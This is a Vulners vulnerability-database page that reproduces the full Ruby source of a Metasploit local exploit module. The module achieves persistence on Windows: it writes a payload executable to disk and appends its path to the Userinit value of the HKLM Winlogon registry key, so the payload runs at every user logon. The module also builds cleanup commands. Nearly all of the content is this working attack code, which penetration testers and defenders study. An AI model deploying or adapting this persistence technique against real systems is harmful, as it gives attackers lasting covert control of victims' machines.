Lucene search
K

Windows Registry Persistence via Userinit

🗓️ 18 Feb 2026 18:59:30Reported by joel <joel @ ndepthsecurity>, h00dieType 
metasploit
 metasploit
🔗 www.rapid7.com👁 251 Views

Installs a payload that runs at user logon by writing to disk and updating the Userinit registry key.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::Powershell
  include Msf::Exploit::Local::Persistence
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Registry Persistence via Userinit',
        'Description' => %q{
          This module will install a payload that is executed during user logon.
          It writes a payload executable to disk and modifies the Userinit registry value
          in "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" to append the
          payload path, causing it to execute when any user logs in.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'joel @ ndepthsecurity',
          'h00die',
        ],
        'Platform' => [ 'win' ],
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
          ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-07-01',
        'Notes' => {
          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
    ])
  end

  def regkey
    'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'
  end

  def check
    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)

    return Msf::Exploit::CheckCode::Safe("Unable to read registry path #{regkey} with key Userinit") if registry_getvaldata(regkey, 'Userinit').nil?

    Msf::Exploit::CheckCode::Vulnerable('Registry likely exploitable')
  end

  def install_persistence
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
    payload_exe = generate_payload_exe
    payload_pathname = writable_dir + '\\' + payload_name + '.exe'
    vprint_good("Writing payload to #{payload_pathname}")
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)

    old_value = registry_getvaldata(regkey, 'Userinit')
    new_value = (old_value.split(',') + [payload_pathname]).join(',')
    vprint_status("Updating '#{old_value}' to '#{new_value}'")
    registry_setvaldata(regkey, 'Userinit', new_value, 'REG_SZ')
    escaped_old_value = old_value.gsub('\\', '\\\\')
    @clean_up_rc = %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v Userinit /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
    @clean_up_rc << "rm #{payload_pathname.gsub('\\', '/')}\n"
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jul 2026 19:02Current
5.9Medium risk
Vulners AI Score5.9
251